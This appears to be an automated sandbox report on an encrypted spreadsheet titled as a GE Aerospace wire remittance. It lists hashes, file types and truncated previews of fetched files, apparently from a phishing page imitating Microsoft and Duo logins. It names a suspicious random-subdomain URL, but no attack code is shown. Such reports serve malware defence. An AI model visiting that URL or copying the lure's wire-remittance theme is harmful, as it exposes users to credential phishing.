                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://yywinjs4bgrxgjy0hoc2skhhgd2kzofulsv3kqb6aqgdv3uks5i1bf5jrct.pafcoedru.com/6894056559485407415933jehptXmtUUSKJHQORWYRDTJNTGMVYIRWCBPHKR
                                                          Preview:1
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65473)
                                                          Category:dropped
                                                          Size (bytes):887789
                                                          Entropy (8bit):5.604484335646272
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:AF78A432536AFC7F965DAEB8389A7AF3
                                                          SHA1:AC7F7D2759037C67CDB29FCD2F34F99CD533BB19
                                                          SHA-256:0F15CE2743F157F1F1D94CA57D2681EC184501CD2D9078FFE90B6DA946C6FB92
                                                          SHA-512:C479404F94F86E78BDEB66AF7FE5CA2E62560F448452A58DB56873C36ACE3B2503406B189F00D3D4979268568FFD1238FC4C016FCB7D33C0C9134BAB4876B68C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*! For license information please see login.js.LICENSE.txt */.!function(){var __webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__(4910),__webpack_require__(3370),__webpack_require__(8815),__webpack_require__(7875),__webpack_require__(8543),__webpack_require__(7313),__webpack_require__(175),__webpack_require__(2698),__webpack_require__(3629),__webpack_require__(8039),__webpack_require__(2203),__webpack_require__(6312),__webpack_require__(9372),__webpack_require__(1661),__webpack_require__(8250),__webpack_require__(2692),__webpack_require__(9317),__webpack_require__(2856),__webpack_require__(5667),__webpack_require__(8463),__webpack_require__(3459),__webpack_require__(9e3),__webpack_require__(8866),__webpack_require__(9607),__webpack_require__(7709),__webpack_require__(6679),__webpack_require__(458),__webpack_require__(1893),__webpack_require__(7793),__webpack_require__(4432),__webpack_require
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                          Category:downloaded
                                                          Size (bytes):17174
                                                          Entropy (8bit):2.9129715116732746
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):5645
                                                          Entropy (8bit):5.403905407666699
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:42F9B3620769199592BDEC7B3D0D6C96
                                                          SHA1:86F772B7419B58761A0E8340CF501B95C42FE096
                                                          SHA-256:917501F2CCF078EFC3EDF9C2B5F6C46953545F02AAFF964BDD38FA22482A4723
                                                          SHA-512:F29D1583C980C8CE9437906B5BDFCBBE50CEB53AC56898F6CEA9ABC6F57834AA5AC6D6203C4BAF70D1ABABAC4A91FE6ACC2077017E4D4EFC1F60DB2E161194CA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:"https://fonts.googleapis.com/css?family=Lato:400,600%7CRoboto:400,500%7CCalligraffitti:400"
                                                          Preview:/* latin */.@font-face {. font-family: 'Calligraffitti';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/calligraffitti/v19/46k2lbT3XjDVqJw3DCmCFjE0vkFeOZc.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjxAwXjeu.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2) format('woff2');. unicode-ra
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):103
                                                          Entropy (8bit):5.0562733136081235
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:DF6BB79AEE43D9D5A80728709461775D
                                                          SHA1:D3E5968AA41A83D7FB29A02CC334C5B91BC6FC9A
                                                          SHA-256:4265954D101E0E33F9B41E444534B63DEDB808856B064A8DBD6E5C36DB03FC23
                                                          SHA-512:E7866F554FEB5E2803B2C50922F13EA73ECE98E808936FAF220C30762B04BED178456B7DA36175979E43F5A37548F8450E311CC0BB7899B840EDCA8A0DBAECAB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:96:0{"sid":"J9f3yBVbhR_mls9_CV9R","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":5000}2:40
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (11150)
                                                          Category:downloaded
                                                          Size (bytes):67311
                                                          Entropy (8bit):5.008339890250903
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:A0D76EE4EEBE69597DFC903B5C4638F0
                                                          SHA1:703E38DFA96E832E859B96153D892F20D932C48F
                                                          SHA-256:8850E24B490C7F7E935F6B4269431C31FC68A20CC455E682960589E8BD287B0A
                                                          SHA-512:14AD4CA47E3F4992C46EAB564032A170F28F5BB7FFE57A97D2984FC1B4DB555C0816685FB6EF06D1BDC1B173ADE9CC073CDBE3EAC64B9421245A0AB4F829E413
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://cisco.login.duosecurity.com/static/css/page/login.css?v=8850e
                                                          Preview:html.border-box{box-sizing:border-box}html.border-box *,html.border-box *:before,html.border-box *:after{box-sizing:inherit}body{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:0.875rem;font-size:0.875rem;font-size:var(--size-font-base);font-weight:400;font-weight:400;font-weight:var(--weight-font-base);line-height:1.5rem;line-height:1.5rem;line-height:var(--size-line-height-body);letter-spacing:0}p{margin-top:0;margin-bottom:0}.caption{font-size:0.75rem;font-size:0.75rem;font-size:var(--size-font-caption);line-height:1.5rem;line-height:1.5rem;line-height:var(--size-line-height-caption);weight:400;weight:400;weight:var(--weight-font-caption-regular)}.caption--bold{weight:900;weight:900;weight:var(--weight-font-caption-bold)}.h1,h2,h3,h4,h5,h6{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:var(--size-font-header-medium);font-weight:900;fo
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2134)
                                                          Category:downloaded
                                                          Size (bytes):13188
                                                          Entropy (8bit):5.4223896155104025
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:7C96A5F11D9741541D5E3C42FF6380D7
                                                          SHA1:D3FA2564C021CF730E58FFDDB138CF6B57ED126E
                                                          SHA-256:81016AC6BE850B72DF5D4FAA0C3CEC8E2C1B0BA0045712144A6766ADFAD40BEE
                                                          SHA-512:23C162A2E268951729B580E5035AD6CA9969CFCC5CE58A220817B912E76B38BE6C29C3CA7680CB4E8198863D95A72EA65BD06FF7189B5C8475E4C1CE501AEAB1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js
                                                          Preview:/*. * Copyright 2016 Small Batch, Inc.. *. * Licensed under the Apache License, Version 2.0 (the "License"); you may not. * use this file except in compliance with the License. You may obtain a copy of. * the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT. * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the. * License for the specific language governing permissions and limitations under. * the License.. */./* Web Font Loader v1.6.26 - (c) Adobe Systems, Google. License: Apache 2.0 */(function(){function aa(a,b,c){return a.call.apply(a.bind,arguments)}function ba(a,b,c){if(!a)throw Error();if(2<arguments.length){var d=Array.prototype.slice.call(arguments,2);return function(){var c=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(c,d);return a.apply(b,c)}}return function(){return a.app
                                                          File type:CDFV2 Encrypted
                                                          Entropy (8bit):7.937936794812805
                                                          TrID:
                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                          File name:GE AEROSPACE _WIRE REMITTANCE.xlsx
                                                          File size:136'192 bytes
                                                          MD5:757277c176f9e1422c082cba5dbad409
                                                          SHA1:80b655603ae9ea900748f6902674ddb1dcb52112
                                                          SHA256:e6232317838ffd2c888c40977818cb91f1fba39cdc658bd480889476710e8a2a
                                                          SHA512:39a84f8a37f925f7f2afc39ca9e50e231360b967988a8346bd026c4ef16ebd020101e9eac5fc8e6e5bdb65e993eae7386816760162f1f0bd8319283cb1729ab6
                                                          SSDEEP:3072:2wQ7fFWHryXAVdZYk0AcHMg8lpF3qUN8:2oHruAdJcT83
                                                          TLSH:AED3129AAB9DA000F5AA5F7D3573C1B4F5962C02CAC3B02F79D8F6089AB55C10917DC7
                                                          File Content Preview:........................>......................................................................................................................................................................................................................................
                                                          Icon Hash:35e58a8c0c8a85b9